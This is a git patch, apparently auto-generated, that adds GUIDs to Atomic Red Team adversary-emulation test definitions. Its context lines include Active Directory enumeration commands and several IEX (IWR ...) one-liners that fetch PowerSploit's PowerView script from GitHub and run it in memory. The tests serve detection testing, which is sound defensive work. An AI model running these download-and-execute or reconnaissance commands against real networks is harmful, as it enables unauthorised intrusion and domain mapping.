From 5e47dae27bdc609f6776f3af93510fb1784906da Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator
Date: Mon, 14 Mar 2022 17:32:49 +0000
Subject: [PATCH] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/T1018/T1018.yaml | 3 +++
 atomics/T1069.002/T1069.002.yaml | 2 ++
 atomics/T1087.002/T1087.002.yaml | 1 +
 atomics/T1201/T1201.yaml | 2 ++
 atomics/used_guids.txt | 8 ++++++++
 5 files changed, 16 insertions(+)
diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml
index b5460626..c1b676c6 100644
--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -311,6 +311,7 @@ atomic_tests:
 name: powershell elevation_required: false - name: Enumerate Active Directory Computers with Get-AdComputer
+ auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
 description: | The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory. Upon successful execution a listing of Computers will output with their paths in AD.
@@ -336,6 +337,7 @@ atomic_tests:
 command: | ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne() - name: Get-DomainController with PowerView
+ auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
 description: | Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed. supported_platforms:
@@ -346,6 +348,7 @@ atomic_tests:
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose name: powershell - name: Get-wmiobject to Enumerate Domain Controllers
+ auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
 description: | The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers. Upon successful execution a listing of Systems from AD will output with their paths.
diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml
index 0b8911c4..ca4b2d31 100644
--- a/atomics/T1069.002/T1069.002.yaml
+++ b/atomics/T1069.002/T1069.002.yaml
@@ -134,6 +134,7 @@ atomic_tests:
 #{adfind_path} -f (objectcategory=group) name: command_prompt - name: Enumerate Active Directory Groups with Get-AdGroup
+ auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
 description: | The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory. Upon successful execution a listing of groups will output with their paths in AD.
@@ -195,6 +196,7 @@ atomic_tests:
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins" name: powershell - name: Get-DomainGroup with PowerView
+ auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230
 description: | Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed. supported_platforms:
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index 6b58abdc..79f6cdf7 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -216,6 +216,7 @@ atomic_tests:
 Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain} - name: Get-DomainUser with PowerView
+ auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
 description: | Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed. supported_platforms:
diff --git a/atomics/T1201/T1201.yaml b/atomics/T1201/T1201.yaml
index 0a7c409c..43716efe 100644
--- a/atomics/T1201/T1201.yaml
+++ b/atomics/T1201/T1201.yaml
@@ -86,6 +86,7 @@ atomic_tests:
 command: pwpolicy getaccountpolicies name: bash - name: Get-DomainPolicy with PowerView
+ auto_generated_guid: 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
 description: | Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller. supported_platforms:
@@ -96,6 +97,7 @@ atomic_tests:
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose name: powershell - name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+ auto_generated_guid: b2698b33-984c-4a1c-93bb-e4ba72a0babb
 description: | The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy. Upon successful execution a listing of the policy implemented will display.
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 80e8ed2f..b8ce28f8 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -890,3 +890,11 @@ a27418de-bdce-4ebd-b655-38f04842bf0c
 46352f40-f283-4fe5-b56d-d9a71750e145
 02e8be5a-3065-4e54-8cc8-a14d138834d3
 d6139549-7b72-4e48-9ea1-324fc9bdf88a
+97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+b9d2e8ca-5520-4737-8076-4f08913da2c4
+e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+5a8a181c-2c8e-478d-a943-549305a01230
+93662494-5ed7-4454-a04c-8c8372808ac2
+3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+b2698b33-984c-4a1c-93bb-e4ba72a0babb